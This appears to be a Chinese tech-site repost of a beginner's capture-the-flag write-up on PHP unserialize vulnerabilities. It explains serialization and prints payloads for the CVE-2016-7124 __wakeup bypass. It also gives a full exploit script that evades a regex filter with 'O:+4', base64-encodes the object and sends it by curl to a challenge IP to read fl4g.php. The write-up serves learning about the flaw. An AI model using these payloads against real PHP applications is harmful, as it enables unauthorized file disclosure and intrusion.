客服电话
APP下载
迪恩网络APP
随时随地掌握行业动态
官方微信
扫描二维码
关注迪恩网络微信公众号
|
根据题总结 源自一道ctf题 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code=
对序列化反序列化进行了理解。
serialize()是序列化函数,它可以保存一个的所有 变量 ,但是不会保存对象的方法,只会保存类的名字。 <?php class A{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } class B{ public $flag = '111'; } $a = new A(); $b = new B(); $a = serialize($a); $b = serialize($b); echo($a); echo($b); ?> 结果如下 O:1:"A":1:{s:4:"flag";s:3:"111";} O:1:"B":1:{s:4:"flag";s:3:"111";} 没有什么区别
反序列化漏洞 unserialize()函数可把序列化数字符串变成php原来的值 所以字符串的参数可控,导致漏洞产生 比如将flag赋值<?php phpinfo;?> <?php $A = 'O:1:"A":1:{s:4:"flag";s:3:"111";}'; $B = 'O:1:"B":1:{s:4:"flag";s:3:"<?php phpinfo();?>";}';
同时还有可能SQL注入利用..由于是新手暂未接触,遇见会回来补充。 回到CTF,CVE-2016-7124,当序列化字符串中的表示对象属性个数值大于真实值时会跳过__wakeup的过滤。
<?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } $a = new xctf(); $a = serialize($a); echo($a); #:4:"xctf":1:{s:4:"flag";s:3:"111";} $test1 = unserialize($a); echo($test1); //////////////漏洞利用.../////////////////// $b='O:4:"xctf":4{s:4:"flag";s:3:"111";}'; ////////////////////////////////////////////
补充上次做的: 绕过正则+wakeup_ <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { if ($this->file != 'index.php') { //the secret is in the fl4g.php $this->file = 'index.php'; } } } if (isset($_GET['var'])) { $var = base64_decode($_GET['var']); if (preg_match('/[oc]:\d+:/i', $var)) { die('stop hacking!'); } else { @unserialize($var); } } else { highlight_file("index.php"); } ?> 因为提示flag在Demo里面,所以首先对Demo进行序列化,处理结果后传参回去给var,进行反序列化。 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { if ($this->file != 'index.php') { //the secret is in the fl4g.php $this->file = 'index.php'; } } } $var = new Demo("fl4g.php"); $var = serialize($var); //对序列号结果进行处理 $var = str_replace(':1:', ':3:',$var);//绕过wakeup $var= str_replace('O:4', 'O:+4',$var);//绕过正则 echo $var; echo base64_encode($var); $curl = curl_init(); //curl_setopt($curl,CURLOPT_RETURNTRANSFER,true); curl_setopt($curl,CURLOPT_URL,'http://111.198.29.45:37473/?'.'var='.$var); $result = curl_exec($curl); var_dump($result);? curl_close($curl); ?>
php在线编译:http://code.php.net.cn/b37q111a 参考:https://xz.aliyun.com/t/378
|
2022-08-18
2022-07-08
2022-08-17
2022-11-06
2022-08-15
说到十大利润最高的东西,很多是我们生活中比较常见的,但也有一些是出人意料之外的暴
krishnaik06/Machine-Learning-in-90-days
Inappropriate implementation in PDF in Google Chrome prior to 102.0.5005.61 allo
armancodv/building-energy-model-matlab: It is a small software which is develope
在美元的英文“dollar”里面明明没有字母“s”,为什么美元的符号($)是一条竖线穿过字
快的笔顺是什么?快的笔顺笔画顺序怎么写?还有快的拼音及意思是什么,好多初学练字者
FGRibreau/import-tweets-to-mastodon: How to import tweets to mastodon (e.g. http
证件照的用途不用细说,很多人都有,但拍好看的人却不多。如何拍好看真得好好学一学,
tboronczyk/localization-middleware: PSR-15 middleware to assist primarily with l
长沙城南,有一所以“环保”为名的学校,从1979年创立以来,四易归属、五更其名。 这
请发表评论